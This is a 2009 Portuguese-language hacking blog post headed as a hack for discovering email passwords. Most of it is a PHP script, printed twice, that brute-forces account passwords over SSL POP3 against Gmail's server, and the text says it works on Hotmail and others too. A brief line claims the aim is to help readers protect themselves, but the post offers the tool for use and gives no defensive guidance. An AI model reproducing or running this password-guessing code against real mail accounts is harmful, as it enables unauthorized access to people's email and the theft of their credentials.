06
MAR
2009
[HACK] - Descobrir senhas de e-mail
Coloco aqui este Hack de php para que dentro das possibilidqdes de cada um arranjar soluções para se protegerem contra isso. Vou descrever um hack para descobrirem senhas utilizando BrutalForce no PHP através do POP3 dos emails, não irei explicar o que significa os jargões e como obter informações, sim somente uma demonstração de um código que foi disponibilizado pela Webzine do 0x000000.
Feito o script para o gmail, afim de que vejam que o nome do utilizador é o email e por isso ja temos 50% de chance a mais para o hack. O script consegue ser rodado para qualquer tipo de POP3 baseado em SSL, como hotmail e muitos outros pela net.
Entretenham-se.
Código:
PHP:
error_reporting(0);
ini_set("max_execution_time",0);
function bruteforce($email) {
$passlist = array('foo','bar','hello','world','abc','123','bazooka','joe');
$start = 0;
while($forced == false && $start <= count($passlist)) { usleep(1000000); $ssl = fsockopen("ssl://pop.gmail.com", 995, $err, $errdata, 40); if (!$ssl) { echo "$errdata" . " => " . "$err";
}
else
{
$auth = fgets($ssl, 128);
fputs($ssl, "USER ".$email."\n");
$auth = fgets($ssl, 128);
fputs($ssl, "PASS ".$passlist[$start]."\n");
$auth = fgets($ssl, 128);
$status = substr($auth, 0, 4);
if($status == "+OK ")
{
$forced = true;
}
if($status == "-ERR") {
$forced = false;
$start++;
}
fclose ($ssl);
if($forced) {
echo "Password found: $passlist[$start]";
}
}
}
return $forced;
}
bruteforce("bananajoe@gmail.com");
Feito o script para o gmail, afim de que vejam que o nome do utilizador é o email e por isso ja temos 50% de chance a mais para o hack. O script consegue ser rodado para qualquer tipo de POP3 baseado em SSL, como hotmail e muitos outros pela net.
Entretenham-se.
Código:
PHP:
error_reporting(0);
ini_set("max_execution_time",0);
function bruteforce($email) {
$passlist = array('foo','bar','hello','world','abc','123','bazooka','joe');
$start = 0;
while($forced == false && $start <= count($passlist)) { usleep(1000000); $ssl = fsockopen("ssl://pop.gmail.com", 995, $err, $errdata, 40); if (!$ssl) { echo "$errdata" . " => " . "$err";
}
else
{
$auth = fgets($ssl, 128);
fputs($ssl, "USER ".$email."\n");
$auth = fgets($ssl, 128);
fputs($ssl, "PASS ".$passlist[$start]."\n");
$auth = fgets($ssl, 128);
$status = substr($auth, 0, 4);
if($status == "+OK ")
{
$forced = true;
}
if($status == "-ERR") {
$forced = false;
$start++;
}
fclose ($ssl);
if($forced) {
echo "Password found: $passlist[$start]";
}
}
}
return $forced;
}
bruteforce("bananajoe@gmail.com");
Ler Mais: TE DA SABEDORIA....VEM AQUI E BEBE UM POUCO!!..........:PC-H4CK3R - A DUVIDA É A FON http://pc-hacker.blogspot.com/2009/03/hack-fescobrir-senhas-de-e-mail.html#ixzz1gz8xtNvU
Under Creative Commons License: Attribution Non-Commercial
Nenhum comentário:
Postar um comentário